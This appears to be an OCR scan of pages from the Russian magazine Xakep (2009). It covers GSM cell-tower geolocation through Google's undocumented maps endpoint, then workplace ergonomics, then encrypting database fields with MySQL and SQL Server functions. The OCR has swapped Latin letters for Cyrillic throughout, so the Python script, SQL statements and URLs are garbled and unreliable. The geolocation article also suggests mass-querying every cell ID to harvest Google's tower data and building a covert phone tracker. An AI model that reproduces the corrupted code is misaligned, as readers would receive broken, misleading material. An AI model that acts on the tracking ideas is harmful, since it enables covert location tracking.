рился со всеми операторами сотовой связи — определение местополо- 
жения работает в любом месте (забегая вперед, скажу, что правильнее 
говорить «может работать в любом месте»]. Ответскрывается в лицен- 
зионном соглашении во время установки программы, на который мы, 
конечноже, забили и сразу нажали «Я согласен» :). А ведьтам черным по 
белому написано, что, принимая соглашение, мы разрешаем программе 
анонимно передавать на сервер информацию отекущем расположе- 
ниииинформациюо сотовых вышках поблизости. Да! Базу да иных с 
примерными координатами базовых станций составляют для Соодіе 
сами пользователи Соодіе Марз, имеющие на борту своих телефонов и 
коммуникаторов встроенный приемникСРЗ. И что самое классное: даже 
при пол ном отказе от использования как официальных, так и неофици- 
альных (собранных энтузиастами с помощью специальных сканеров — 
подробнее читай во врезке] баз с расположением станций, функция для 
определения месторасположения работает на «ура». Проверь сам. 

^ 65М-НАВИГАЦИЯ СВОИМИ РУКАМИ 

Возможность посмотреть в программе свое расположение — само по 
себе здорово, но разве ж можно отказаться от соблазна использовать 
базы Соодіе’а в корыстных целях? Кактебе, например, идея создать 
собственный трекер, который определял бы текущее расположение БС и 
передавал его на наш сервер? Эдакийжучоксредствами самого телефо- 
на, который работает везде и всегда! 

Компания не разглашает протокол взаимодействия Ооодіе Марз, не пуб- 
ликуя АРІ, однако его легко вскрыли, просто проснифавтрафик и реверс- 
нув часть кода. Помимо Ыір-запросов на загрузку карт, отчетливо видно, 
что программа отправляетзапросы по адресу ШрУ/ѵѵѵѵѵѵ.доодІе.сопп/ 
діт/ттар . причем именнотогда, когда пользовательжелает получить 
текущее месторасположение. Вот и попался наш скриптик — в качестве 



ХАКЕР 04 /124/ 09 



► 027 







> Ііпкз 

• Параметры Соодіе 
Марз: таркі.сот/ 
ѵѵікі/ОоодІе Мар 
Рагатеіегз . 

• Делаем 6Р5-адап- 
тер для мобильного 
телефона своими 
руками: 

ІіпкегІод.сот/2007/ 

07/13/іпІегІасіпд-ап- 

аѵг-сопігоііег-іо-а- 

дрз-тоЫІе-рбопе . 

• Мануал по полу- 
чению координат 
по данным сотовой 
точки через УаЬоо: 
сІеѵеІорег.уаЬоо. 
сот/угЬ/гопеІад/ 
ІосаІесеІБЫтБ 

• Реализация работы 
с базой данных 
Ооодіе Марз. 

На РНР: ЫірУА/ѵѵѵѵѵ. 
ѵѵіІгаскз.сот.Ьг/ 
дтарз.ІхБ 
]2те: ЫірУАл/ѵѵѵѵ. 
тарпаѵ.зрЬ.ги/зіІе/ 
е 1 07 рІидіпзЛогит/ 
Іогит ѵіеѵѵіоріс. 
рбр?9736 . 

На Руібоп для 560: 

ЬБрЛ/ЫоддеЬи. 

пеі/2008/07/доодІе- 

сеіі-іоуѵег-тарріпд- 

ѵѵііЬ-рѵіЬоп-оп-збО . 

На С#: Шр://тарз. 

аірбасіех.сіе/сіаіабіез/ 

ІсіОеІ Ы 1 782832Ш2. 

сз. 

На Реірбі: Мир:// 
Іогит.пеітопііогги/ 
аЬоиі4470-0-азс-60. 
Мті. 




О 



> СІѴСІ 

Все описанные 
скрипты, утилиты для 
трекинга и навигации 
ты найдешь на нашем 
диске. 



ДСкриптдля взаимодействия с сервисом Соодіе 



параметров ему передаются технические значения базовой 
станции: МСС, МЫС, НАС и СеІІЮ. 

МСС — код страны (для России — 2 50) 

МЫС — код сети (МТС — 01 , Мегафон — 02 , Билайн — 
99 и т . п . ) 

БАС — код локальной зоны (другими словами, 
совокупности базовых станций, обслуживаемых 
одним контроллером) 

СеІІЮ (СІБ) — идентификатор, состоит из номе- 
ров базовой станции и сектора 

Зная, куда посылать данные, осталось эти значения 
получить! Наиболее простой способ — прямо в программе 
Соодіе Марз перейти в «Справку», там щелкнуть «Общие 
сведения», и в самом конце этой странички будет строка 
с параметрами в формате туБМСС:МІ\ІС:ЕАС:СеІІЮ. Куда 
больший простор для деятельности предоставляют спе- 
циальные программы пеітопііог’ы: с их помощью можно 
логировать параметры при переключении от одной стан- 
ции кдругой, извлекать параметры «соседей» (находя- 
щихся в поле зрения других БС], да и просто получать куда 
более подробную информацию. Для каждой платформы 
есть свои реализации нетмониторов с различными воз- 
можностями — ты можешь выбрать программу под себя, 
почитав врезку. 

Теперь, когда все необходимые параметры получены, 
можно обратиться на сервер и попробовать получить ответ. 
Приведу для этого несложный скрипт на Руібоп’е, который 
написал наш соотечественникБкѵо и опубликовал на фору- 
ме ішідіпліеІлішТ 

пеб , сіб, Іас = 25002, 9164, 4000 
ітрогб игІІіЬ 

а = '000Е00000000000000000000000000001В000000 
0000000000000000030000' 

Ь = Бех (сіб) [2:] .2бі11(8) + Бех(іас) [2 : ] . 

2ІІ11 (8) 

с = Бех (біѵтоб (пеб ,100) [1]) [2:] . гбііі ( 8 ) + 

Бех ( біѵтоб ( пеб ,100) [0]) [2:] .гбііі (8) 
збгіпд = (а + Ь + с + ' РРРРРРРР00000000 ' ) . 
бесобе ( ’ Бех 1 ) 
бгу : 

баба = игІІіЬ. игіореп ( 1 Бббр : / /ѵтѵі. доодіе . 
сот/діт/ттар 1 , збгіпд) 
г = баба . геаб ( ) . епсобе ( ’ Бех 1 ) 
іб Іеп (г) > 14 : 

ргіпб біоаб ( іпб (г [ 14: 22], 16)) /1000000, 
біоаб ( іпб (г [ 22:30], 16 ) ) /1000000 
еізе : 



ргіпб ’ по баба іп доодіе 1 
ехсерб : 

ргіпб ' соппесб еггог' 

Для запуска, естественно, потребуется интерпретатор 
Руібоп’а (обязательно 2-й ветки, потому как на 3-й не 
запустится), который можно скачать с сайта Ыір://рѵіЬоп. 
огд/сіоѵѵпіоасі/геіеазез . В первой строке скрипта, как 
несложно догадаться, необходимо подставить ЫЕТ (МСС и 
МЫС, написанные слитно), СЮ, БАС. В результате скрипт 
сформируетзапрос на сервер ЫірѴ/ѵѵѵѵѵѵ.доодІе.сопп/ 
діт/ттар и отправит его. Если базовая станция с этими 
параметрами есть в базе, то на экран выведутся координа- 
ты, например, «59.200274 39.836925». В противном случае 
скрипт выдаст ошибку: «по баіа іп доодіе». Любителям 
программировать не составит труда добавить пару стро- 
чек, например, по указанным ЫЕТ и БАС перебрать все 
варианты СЮ (от 1 до 65536), и, посмотрев, какие сектора 
имеются у Гугла, узнать их примерные координаты. Если 
тебе неохота морочить голову скриптами, нанашдискмы 
выложили ОСП-программу, написанную на С# (исходники 
прилагаются). В этом случаеты автоматически получишь 
еще и ссылку, отображающую координаты на сайте Соодіе 
Марз. Ссылки на реализации на других языках смотри в 
боковом выносе. Интересно, что на сервер передаются 
всего лишьтри параметра, причем ключевыми являются 
только значения БАС и СеІІЮ. А МСС/МІМС необходимы на 
тот случай, если в базе есть несколько пар с одинаковыми 
БАС, СеІІЮ. При этом телефон может получать намного 
больше информации о текущей станции — взять хотя бы 
мощность сигнала, однако эти параметры в расчетах не 
используются. Получается крайне простой алгоритм. Один 
сектор — одна координата; независимо оттого, находится 
ли пользователь в 1 00 метрах от базовой станции или в 
километре от нее, координата будет одинаковая! 

Отдельно хочу сказать, что замечательный проект«Яндекс. 
Карты», который я особенно люблю за возможность отобра- 
жения точек, имеетточнотакой же функционал. И ровнотак 
же, как и Соодіе, предоставляет своей программе данные о 
точке по запросу с указанием Сеіі Ю, БАС, ЫЕТ параметров: 

Бббр : / /шоЬіІе .гпарз .уапбех . пеб/се11іб_1осабі 
оп/?&се11іб=%б&орегабогіб=%б&соипбгусобе=%б 
&1ас=%б 

Единственное отличие втом, что ответсервис«Яндекса» 
возвращает вХМБ-формате, который легко и удобно парсит- 
ся для извлечения любых параметров. 
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Н КАК ЗАСТАВИТЬ РАБОТАТЬ НАВИГАЦИОННЫЕ ПРОГРАММЫ 

Какой бы замечательной ни была программа Соодіе Марз, использовать 
ее в качестве навигационного инструмента, мягко говоря, затрудни- 
тельно. Было бы здорово, пускай и примерные, но все-таки координаты 
скормить нормальной программе навигации, схорошими картами, 
подробной адресацией и проработанными алгоритмами прокладки мар- 
шрута. Некоторые программы, например, «Навител» и «Автоспутник» 
имеютеще один плюс: они умеют подгружать информацию о пробках и 
учитывать ее при составлении маршрута. Чисто теоретически, ничего не 
стоит написать подобное приложение самому. Алгоритм прост: 

1. Получаем текущие координаты при каждой смене базовой станции; 

2. Отправляя запрос на спутник, получаем примерные координаты; 

3. Эмулируем в системе последовательный порти в простом формате ІЧМЕА, 
который используют ОРЗ-навигаторы, транслируем туда текущие координаты. 
Именно этот принцип лежит в программе ѴИиаІбРЗ ( ѵѵѵѵѵѵ.каппіех.сопп ]. 
предназначенной для устройств на платформе ѴѴіпсІоѵѵз МоЬіІе 2003, ѴѴМ 
5, ѴѴМ 6, ѴѴМ 6.1 . Бесплатная Іііе-версия программы определяеттекущее 
расположение по вышкам сотовой связи и эмулирует ОРЗ. После запуска 
прога создает в системе новый порт, который нужно указать в настройках 
любимой навигационной программы — и та, ничего не подозревая, будет 
считать, что подключена к настоящему ОРЗ-приемнику. 



Увы, в России хоть как-то заставить работать 5КУН00К мне так и не 
удалось. Зато наши соотечественники вплотную взялисьза реализацию 
подобной идеи, воплотив в жизнь сервис ѴѴі28ео ( ѵѵі2део.ги І. который 
мне почему-то оченьхочется назвать ѴѴі20о :]. Ребята уже сейчас предо- 
ставляют приложения для ѴѴіпсІоѵѵз МоЬіІе, ЗутЬіап, ѴѴіпсІоѵѵз и Мае 05 
X, а для навигации используют базу ІР-адресов, информацию о ячейках 
65М и, собственно, точках доступа ѴѴі-Рі. Базы никому незапрещено ис- 
пользовать в своих целях, воспользовавшисьоткрытым АРІ ( іНрУ/Іабз. 
уѵі2аео.ги/Ьазісарі.рбр ). Огорчаеттолько, что проект будет развиваться 
только в тех городах, где большое покрытие ѴѴі-Рі. Атаковым пока можно 
назватьтолько Москву. 

^ А КАКЖЕ ТРЕКИНГ? 



Н НА ЧТО СПОСОБЕН ѴѴІ-РІ 

Будучи раздосадован тем, что большинство ѴѴіРі-точке в городе либо 
закрыты, либо платные, подумай отом, что и им можно найти приме- 
нение. Полагаю, не надо говорить для чего :]. Принцип точнотакой же: 
определив всеточки доступа поблизости, отправляем информацию 
о МАС-адресах (добавляя при желании идентификатор сети 55Ю) на 
специальный сервис. Тот проверяет их координаты и выдаеттебетвое 
примерное расположение. Такая технология давно функционирует в 
Штатах, где покрытие ѴѴі-Рі зашкаливает настолько, что скрыться от него 
уже, похоже, негде. ѴѴР5 (ѴѴі-Рі Розібопіпд ЗузРепп) предоставляет ком- 
пания 5 КУНООК ѴѴігеІезз ( ѵѵѵѵѵѵ.зкѵЬоокѵѵігеІезз.сопп ). разработавшая 
клиентские приложения для разных платформ и собрав первоначальную 
базу сточками доступа. Быстро появились и альтернативные приложе- 
ния, которые, используя АРІ-сервиса, получают координаты пользова- 
теля. Среди них — замечательный плагин для Рігеіох’а Эеосіе ( ЫТр:// 
ІаЬз.тогіІІа.сот/деосІе ѵѵеіеоте ). который подставляет информацию 
отекущем местоположении на любом веб-сайте (во время создания 
нового поста в блог, например]. 



Выше мы говорили отрекинге пользователя — системе, позволяющей 
в реальном времени отследить положение пользователя на карте. 
Неплохо, если бы подобную штуку установили на свои телефоны все 
друзья. Тогда ничего бы не стоило узнать, кто где, и при необходимости 
— договориться о встрече. Ребята из Соодіе реализовали это в функции 
Соодіе Баіііисіе, с недавнего времени доступной опять же пользовате- 
лям мобильных Соодіе Марз. Ксожалению, через браузер просмотреть 
расположение друзей можно только в Штатах, но ведь ничего не мешает 
использоватьамериканский прокси? 

Есть и другой вариант. На сайте ЫірѴЛогит.хсІа-сІеѵеІорегз.сопп/ 
зЬоѵѵіЬгеасІ.рЬр?1=340667 совершенно бесплатно можно скачатьспеци- 
альную программу для трекинга, клиентская часть которой устанавлива- 
ется на коммуникатор на базе ѴѴМ, а серверная — на любой веб-сервер. 
Далее положение объекта можно просмотреть через программу Соодіе 
Еагіб. Реально работающее решение для бизнеса, которое с учетом 
открытых исходников несложно доработать под себя! □С 



Программы 

КеШопіІш 

Чтобы понимать, какую базовую станцию телефон использует в 
текущий момент, и получить ее параметры, понадобятся специ- 
альные программы. Ксожалению, универсальной программы 
нет, поэтому для каждой платформы придется найти подходящий 
инструмент! 

ЗутЬіап: ЕіеІсГГезі:, СеІІТгаск, Везі СЗМИаѵі^аіог 

ѴѴіпсІоѵѵз МоЬіІе 2005: СР5 Сеіі 

ѴѴіпсІоѵѵз МоЬіІе 5. 0/6.0: ИеШопітг32, ѴѴМСеІІСаісЬег, 
СеІІРгоШеЗѵѵіисІіег (замечу, что не все программы работают со 
всеми радио-прошивками) 



О базовых станциях 
сотовых сетей 

В статье я упоминал о неофициальных базах данных с расположе- 
нием вышек различных сотовых сетей. В интернете существует 
немало проектов, где энтузиасты делятся собранной нетмонито- 
рами информацией. Из иностранных это — сеІЫЪ.ог^/аЪотарі. 
рЬр, ѵѵѵѵѵѵ.орепсе11і(і.ог^/арі. Ьі:і:р://^5т1ос.ог^/сосіе. сеШб.иеНп. 
п1. Каждый из них имеет простой АРІ для получения координат с 
помощью обычного НТТР-запроса, при этом в качестве параметров 
указываются традиционные МСС, МИС, Сеіі ГО и БАС. 

Отдельно хочу упомянуть наш русский проект ЫеГтопЦог.ш. в 
котором собрана инфа о большом количества БС Мегафона, МТС, 
Билайна, ТЕЛЕ2 и даже ЗкуНпк. К тому же, на сайте располагается 
еще и крупнейший форум для исследователей сотовых сетей. 
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» рс_гопе 



» 



рс_гопе 



1 ) Укажи свой рост: 

152 155 157 160 163 165 168 170 173 175 178 180 183 185 188 191 



2) А теперь оьустрой свое раьочее место 
в соответствии с тревованиями 



ВИТАЛИЙ ТРАВИН 

/ѵітѵАзігамАп.ки/ 





Уровень глав при 
равоте стоя 



1 66 см. 



Расположения 

логтей 



1 09 см. 



За своим рабо- 
чим место люди 
зачастую проводят 
большую часть 
дня. Самое время 
задуматься об эрго- 



КОГДА 
ТЫ СТАНЕШЬ СЛЕПЫМ 



Это только сейчас кажется, что здоровье будет всегда. 



Если продолжать пялиться в старый монитор 1 8 часов в сутки, сидя на 
кухонной табуретке и пожевывая гамбургер, здоровью рано или поз- 
дно придет конец! И это я тебе точно говорю. 



Перспективы не самые радужные, прав- 
да? С работой в ІТ нереально избавиться от 
сидячего образа жизни перед компьютером, 
но можно постараться свести последствия к 
минимуму. 

Воттебетри совета, как не стать больным и 
слепым гиком, у которого есть ответ на любой 
вопрос по ядру ѴѴіпбоѵѵз, но нетэлементарно- 
го здоровья. 



В СДЕЛАЙ ПАУЗУ — СКУШАЙ ТВИКС 

Кистевой туннельный синдром запястья, 
искривление позвоночника, боли в шее, лишний 
вес и многое другое — вот угрозы для тех, кто 
слишком много работает за компьютером. Ну, 
или не работает — это уж кому как повезет. В 
любом случае, увлекшись реверсингом или 
иным интересным занятием, можно залипнуть 
на несколько часов и оставаться при этом почти 



неподвижным. Так, какже быть? Брать себе лич- 
но го ассистента в лице утилиты ѴѴогкгаѵе [ ЬНр:// 
ѵѵѵѵѵѵ.ѵѵогкгаѵе.ога/ѵѵеіеоте ), которая будет 
следитьзатем, чтобыты не перетрудился! Более 
того — силой за ста в ит делать небольшие паузы 
и выполнять зарядку для разных частей тела. И 
понятно, что ты знать не знаешь, какэту самую 
зарядкуделать.Тулза сама покажет, как размять 
те части тела, которые попадают в область риска. 



► 030 
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Смена тонов монитора в зависимости от 
времени сутокзаметно снижает усталость 
глаз 




ѴѴогкгаѵе не даст заработаться и заставит 
сделать паузу 



Внешне прога — небольшое окошко с 
таймерами. Первый таймер — это время, 
через которое нужно просто пол минуты 
передохнуть (микропауза). Второй — сколь- 
ко осталось до 10-минутного перерыва 
(обычно он раз в час). И третий — остаток 
общего рабочего времени. На перерывах 
можно сделать упражнения для кистей рук и 
пальцев, для глаз, плеч и шеи. Само собой, 
работа работе рознь. И один может ходить 
пить чай хоть раз в полчаса, а у другого, дай 
Бог, выпадет лишняя минутка, чтобы сгонять 
по нужде. Поэтому временные интервалы 
нужно настроить по своему усмотрению. По 
себе знаю: когда сильно занят, на все эти 
предупреждения, симпатичные окошки и 
громкие фразы — становится просто поло- 
жить. Получается, что, потратив усилия на 
настройку подобных игрушек, потом пере- 
стаешь их замечать. Но ѴѴогкгаѵе игнориро- 
вать себя не даст! В конфиге можно задать, 
разрешается ли откладывать паузы или нет. 

В самых тяжелых случаях доступна опция 
«Блокировать компьютер». И тут уж ничего 
не поделаешь: либо зарядка, либо ребут :). 
Если уже просчитал варианты и, хихикая, 
собираешься переключиться на стоящий 
рядом ноутбук, знай: ничего не выйдет. 

Прогу можно установить на несколько ком- 
пьютеров сразу (хоть под линуксом, хоть 
под Виндой) и синхронизировать время для 
упражнений. 

г СИДЕТЬ НАДО ПРАВИЛЬНО 

Рабочее место нужно подогнать под себя. 

Глупо отказывать себе в хорошем кресле, раз 
проводишь на нем большую часть дня. Для оп- 
тимального расположения рук, монитора и глаз 
применяются специальные способы расчета, 
но это полный изврат. Зато можно просчитать 
такие параметры через веб-сервис ѴѴогкзрасе 
Ріаппег [ іпІегпаІаррв.егаоІгоп.сот/МігѴѴеЬТооІ/ 
егдоТооІ теігіс.ЬітІ. ) и постараться учитывать 
их, обустраивая рабочее место. Все расчеты 
базируются на исследованиях еще 1 988 года, но 
повода им не верить нет. Кстати: все расчеты по 
умолчанию осуществляются в дюймах, но если 
присмотреться (надеюсь, созрением.утебя еще 
все в порядке?), то можно найти ссылку для пере- 
вода в метрические система исчисления. 

И не забудь общие правила: верхняя часть 
монитора должна располагаться на уровне 
глаз, а клавиатура по высоте должна быть на 
уровне локтей. 



Н СПАСИ ГЛАЗА 

Неправильное расположение экрана мони- 
тора, маленький шрифт, слишком светлый 
или темный экран — основные причины 
хронической головной боли у гиков. Обижаясь 
на родителей в детстве, ты, вероятно, не мог 
понять, почему нельзя смотреть телевизор в 
темноте. Светло, темно — какая, блин, разни- 
ца? На самом деле, разница есть! Мало кому 
надо объяснять, как начинает резать глаза 
после нескольких часов перед монитором в 
темноте. Самый верный способ помочь себе — 
пойти спать, послав все дела куда подальше. 
Здоровье-то дороже. Знаю-знаю: сроки горят, 
заказчики что-то требуют, а завтра уже надо 
показать полурабочий вариант новой про- 
граммы боссу. Облегчить страдания способна 
иих( сот/Ких І Программа 

просто изменяет цветовой профиль монитора 
в зависимости от времени суток. Ночью глаза 
меньше устают от теплых цветовых тонов, 
днем — отярких и холодных. Могу сказать по 
собственному опыту: штука реально работает! 
О подобной утилите я задумался, когда увидел, 
что некоторые макбуки сами умеют регули- 
ровать подсветку монитора в зависимости от 
освещения (определяется встроенной каме- 
рой или сенсорами в зависимости от модели). 
Казалось бы, такая ерунда, а помогаеточень 
здорово. У Них никаких сенсоров нет, поэтому 
освещенность она может просчитывать по 
времени суток: для этого в настройках указы- 
ваются координаты твоего местоположения. 
Ачтобыты нелез в справочники или Ооодіе, 
тутже доступна ссылка на удобную страничку 
для поиска координат. Версии программы 
есть как для ѴѴіпсІоѵѵз, так Біпих и Мае 05Х. 
Глазам необходим отдых. Причем — каждые 
40-50 минут. Врачами рекомендуется целый 
ряд методик и упражнений, предназначенных 
для отдыха глаз. Болеетого, разработаны и 
любопытные программы, которые напоминают 
тебе, когда и какие упражнения нужно делать. 
Для примера: посмотри ЕуезКеерег (уууууу^ 
ді.ги/еуевкеере Н — русскоязычный «напоми- 
натель». В нем приведены упражнения для 
отдыха глаз, разработанные специалистами 
НИИ гигиены зрения. Использовать все это 
или нет — дело твое. Можно забить и тихо на- 
деяться, что в век генной инженерии, клонов 
и нано-технологий можно будет безвозмездно 
скачать себе новую спину из интернета, а гла- 
за пофиксить патчем. Но мы бы рассчитывать 
на это не стали :). НИ 




смотри ТВ 

без компьютера! 



Г 




ТѴ РРЮ 1 680 



подарит вам массу 
удовольствия за 
небольшие деньги! 

•Качественный прием телесигнала 
•Небольшие размеры 
•Русскоязычное экранное меню 
•Регулировка яркости, контрастности 
и других параметров для 
качественного изображения 
•Быстрое сканирование каналов 
•Интерфейс РІид апб РІау, установка 
ПО не требуется 

•Поддержка современных игровых 
консолей и ѴСОЮѴО-плееров 

СЗЦЕАЛТЕК 

ѵѵѵѵѵѵ . Іеасііек.сот 

Техническая поддержка в России 

О : ги.5ирроЦ@ІеасІіек.сот 
3 : +7 927 7215046 
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Реклама 






»рс_20пе 




АНДРЕЙ КОМАРОВ 

/ КОМАРОѴГаіЮЕРЕЫСЕ.РУ / 



БАЗУ ДАННЫ 
НЕ СТАЩИТЬ! 

Правильные способы защитить данные в таблицах БД 



Как же ошибаются те люди, которые доверяют за щиту данных исклю- 
чительно самой СУБД. Мол, если пароль на подключение хороший и 
версия демона — самая последняя, то все будет нормально. Ничего 
подобного. Базы каксливали.так и будут сливать. А наша задача — 
сделать их нечитаемыми для тех, кому они не предназначены. 



Актуальная проблема из мира информа- 
ционной безопасности — обеспечить со- 
хранность данных. Есть ситуации, в которых 
даже при наличии серьезной защиты сис- 
темы, сохранность данных оказывается под 
большим вопросом. Как та к? Могу привести 
пример из личного опыта, когда в разглаше- 
нии информации был виновен засланный 



сотрудник конкурирующей компании. Нахо- 
дясь на рабочем местом и будучи технически 
подкованным, он взламывал сервера баз 
данных банальным брутфорсом через тер- 
минальное соединение. Базы с клиентами 
«засланец» перепродавал другим компани- 
ям, а «интересная» информация о ведении 
бизнеса отправлялась сотрудникам силовых 



структур. Что из этого вышло, объяснять из- 
лишне. Вообще, имея физический доступ к 
локальной сети, инсайдер мог поступить го- 
раздо проще: атаковать программу, которая 
работает с базой данных. Нередко сценарий 
взлома сводится ктому, что из программы 
разными способами извлекаются конфиги 
для подключения кбазе. Захвативтуже 1 С, 
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которая хранит в себе конфиги подключения 
к базе (в то мчи еле, шифрованный обычным 
ХОВ’ом пароль], злоумышленник получает 
доступ к самой базе. Особо не стесняясь, 
он может ее выкачать, модифицировать 
или просто удалить. Такая брешь в защите 
способна сыграть злую шутку, особенно в 
корпоративной среде. 

В статье я как раз хочу рассказать о том, 
как обезопасить информацию в обычной 
базе данных. Даже если СУБД будет взло- 
мана или левый человек скопирует данные, 
утечки конфиденциальной информации не 
произойдет! 

г ШИФРОВАНИЮ — БЫТЬ! 

Общий подход прост до гениального: раз 
злоумышленник гипотетически сможет 
извлечь данные, надо сделать так, чтобы 
он их не смог прочитать. Информацию 
все равно придется хранить в базе, но... 
ничего не мешает хранить ее в каком 
угодно виде, в том числе зашифрован- 
ном! Главное, чтобы мы сами потом смог- 
ли расшифровать :]. Компания БреІаЬз 
[ зреЦаЬз.ги/з ре ЦаЬзС гурію 1 С.Ьігп ) как-то 
анонсировала продукт, организующий 
дополнительную безопасность бухгалтер- 
ских 10 на уровне шифрования данных, 
причем на полностью прозрачном уровне. 
Пользовательские приложения, не подоз- 
ревая о надстройке, работали в обычном 
режиме. Увы, компания прекратила раз- 
работку этого направления. Но реально 
обойтись и без подобных инструментов, 
ведь для шифрования сгодятся даже штат- 
ные средства СУБД! 

Любая современная СУБД, если это, конечно, 
не собранная на коленке курсовая, может 
похвастаться достаточно надежными меха- 
низмами шифрования данных. В той же 
самой Му50І_ я по памяти насчитал около 
14 соответствующих функций, которые тебе 
наверняка хорошо известны: 

АЕ8_ЕШСКУРТ ( ) Шифрование АЕ8 
АЕ8_БЕСКУРТ ( ) Расшифровка АЕЗ 
СОМРКЕ88 ( ) Возвращение резуль- 

тата в бинарном виде 
БЕ8_ЕШСБУРТ ( ) Шифрование БЕЗ 
БЕ8_БЕСБУРТ ( ) Дешифрование БЕЗ 
ЕЫСОБЕ ( ) Шифрование строки 

поверхностным паролем (на выходе 
получается шифрованное слово пер- 
воначальной «рІаіпБехР» длины) 
БЕСОБЕ ( ) Расшифровка текста, 

обработанного функцией ЕЫСОБЕ ( ) 
ЕШСКУРТ ( ) Шифрование с помощью 

Бпіх'ового системного вызова сгурб 
МБ5 ( ) Подсчет МБ- 5 суммы 

ЗНАК), ЗНА ( ) Подсчет ЗНА-1 (160- 
бит) 

Для их применения надо лишь чуть изме- 
нить свои ЗОЕ-запросы, добавив в нуж- 
ном месте функции АЕ5_ЕІ\ІСНѴРТ(] или 



0Е5_ЕІ\ІСПѴРТ(), которые считаются наиболее 
надежными в МуЗОБ на текущий момент. 
Например, так: 

ШЗЕКТ ШТО Р ѴАББЕЗ (1,АЕ5_ 
ЕШСКУРТ ( ' РехР ' , 1 раззжэгб ' ) ) ; 

Приятно признать, что хорошие программис- 
ты эти функции используют. Часто во время 
проведения ЗОБ-инжекции мне приходи- 
лось ломать голову и определять функцию, 
которую использовал кодер для крипточки 
данных. В результате, требуется производить 
те же АЕ5_Б ЕС РУ РТ(АЕ5_Е N С РѴРТО) наряду 
с ипЬех(ЬехО). 

Ш Т-501. 

Помимо симметричного шифрования, когда 
упаковка и распаковка текста производятся 
одним и тем же ключом (общим для двух 
участников обмена сообщениями], поддержи- 
вается и ассиметричное криптование. Идея 
ассиметричных алгоритмов подразумевает 
наличие двух ключей — открытого и закры- 
того (секретного]. Один из них используется 
для шифрования информации, а другой — 
для дешифрования. Если кодирование осу- 
ществляется с помощью открытого ключа, то 
расшифровать такие данные можно только с 
помощью парного ему закрытого. Предлагаю 
разобраться с этим на примере МісгозоЛ 
ЗОБ Зегѵег, который часто используется в 
корпоративных порталах и сложных при- 
ложениях. Для шифрования применяются 
функции Т-ЗОБ, представляющие собой 
специальное дополнение языка ЗОБ. Оно 
поддерживает управляющие операторы, 
локальные переменные и различные допол- 
нительные функции. Одна из таких функций 
— ЕпсгурШуСеііО, используемая для асси- 
метричного шифрования данных с помощью 
сертификатов. Открытым ключом тут выступа- 
ет сертификат. Только откуда этот сертификат 
взять? Ответ прост — сгенерировать с помо- 
щью другой специальной функции. Покажу 
на примере, как можно сгенерировать сер- 
тификат с именем для апсіге] базы «Вапк» с 
помощью хранимой процедуры: 

БЗЕ Вапк; 

СКЕАТЕ СЕКТІЕІСАТЕ апбгез 

ЕШСКУРТІОШ ВУ РАЗЗШВБ = 
' рСЕБ4ЬЬ9 2 5БСѵЬб2 4 3 9 5 8 7у ' 

# Для генерации с использованием 
подгрузки из файла 

# ЕРОМ ЕІЬЕ = ' с : \8Шірріпд\СегІ:з\ 

ЗШірріпдІІ . сег 1 

# ЖТН РКІѴАТЕ КЕУ (ЕІЬЕ = ' с : \ 

8Мрріпд\Сегбз\8Мрріпд11 .рѵк ' , 

ЖТН ЗБВШЕСТ = ' Етріоуегз 

Ассезз ' , 

ЕХРІВУ_ВАТЕ = ' 10/31/2 009 ' ; 

СО 

У нас создался сертификат! Теперь его можно 
без проблем использовать для размещения в 



таблице зашифрованных записей, выполняя 
привычные ЗОБ-запросы: 

ШЗЕКТ ШТО [БАЗА] . [ТАБЛИЦА] 
ѵаіиез ( N 1 ДАННЫЕ ДЛЯ ЗАШИФРОВКИ', 
ЕпсгурСВуСегб (Сегб_ІВ ( ' апбгез ' ) , 
©сіеагкехб) ) ; 

СО 

В этом примере неформатированный текст 
из переменной йсіеагіехі: шифруется серти- 
фикатом с именем « а п сі ге ] » . Зашифрованные 
данные помещаются в таблицу «ТАБЛИЦА». 
Уточню, что данные могут быть расшифро- 
ваны только с помощью соответствующего 
закрытого ключа (как уже было сказано, 
«приватного»]. 

Имя функции для обратного преобразо- 
вания угадать несложно: ОесгурШуСегД). 

А вот синтаксис более хитер, и с ним все 
чуть сложнее. Дело в том, что на приват- 
ный ключ, как правило, закладывается 
дополнительный пароль (раззрбгазе). Его 
необходимо ввести, и по этой причине он 
обязательно будет присутствовать в коде 
запроса или процедуры. Это не очень хоро- 
шо, потому что его можно быстро увести. Но 
с этим мы разберемся позже, когда пого- 
ворим о безопасности хранимых процедур. 
А пока — код для извлечения данных из 
шифрованной БД: 

ЗЕЬЕСТ сопѵегі (пѵагсЬаг (шах) , 
ВесгурбВуСегб (Сегк_ІсЦ 1 апбгез * ) , 

РгокескебБаба , 
N ' рСЕБ4ЬЬ925БСѵЬб243 9587у ' ) ) 

ЕКОМ [БАЗА] . [ТАБЛИЦА] 

ШЕКЕ БезсгірБіоп 

= Ж Етріоуегз Ассезз'; 

СО 

В этом примере производится выбор- 
ка строк из таблицы [БАЗА]. [ТАБЛ ИЦА], 
помеченных как «Етркэуегз Ассезз». 
Пример дешифрует зашифрованный 
текст с помощью закрытого ключа сер- 
тификата «Апсіге]» и дополнительно- 
го пароля р0БВ4ЬЬ92500ѵЬсІ2439587у. 
Расшифрованные данные преобразуются 
из типа ѵагбіпагу в тип пѵагсбаг. 

Надо сказать, что ассиметричные пре- 
образования гораздо более накладны, 
чем шифрование и дешифрование с 
использованием симметричного ключа. 
Поэтому использование ассиметричного 
шифрования не рекомендуется при работе 
с большими объемами данных, например, 
таблицами пользовательских данных. Это 
важно учитывать при особо больших базах, 
а также базах, структура которых не приве- 
дена к одной из нормальных форм. 

Н ПРЯЧЕМ ХРАНИМЫЕ ПРОЦЕДУРЫ! 

Если ты не заметил, многое упирается в 
то, что вся конфиденциальность и целост- 
ность завязана на использование хранимых 
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• Не забывай о 
самых простых ис- 
тинах традиционной 
криптографии: 

• Чем более накру- 
чен алгоритм шиф- 
рования, тем больше 
ресурсов процессора 
он будет кушать; 

• Ассиметричная 
криптография 
обеспечиваетболее 
надежную защиту, 
чем симметричная 
(даже с ключами 
одинаковой длины], 
но ее исполнение в 
базах может ощутимо 
замедлить весь про- 
цесс работы; 



^* ************************************************ ******** ^ 
У* Рііе ѵгігсеп Ьу 5Су_ зегѵег зузсоттеітсз Оесгургог ѵі.1 */ 
/* соругідітс (с) 2001 гіомыАК */ 

у* ********************** ********************************** у 
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Вместо кода процедуры — сплошные знаки вопроса. Взломщикв обломе 



• Действия по 
шифрованию базы 
напрямую связаны 
с модификацией 
обращений клиента. 
Увы, возможность 
«прозрачного» 
шифрования базы на 
сегодняшний день 
существует только в 
М55СИ 2008 (в вер- 
сии Епіегргізе]. Эта 
Іфункция именуется 
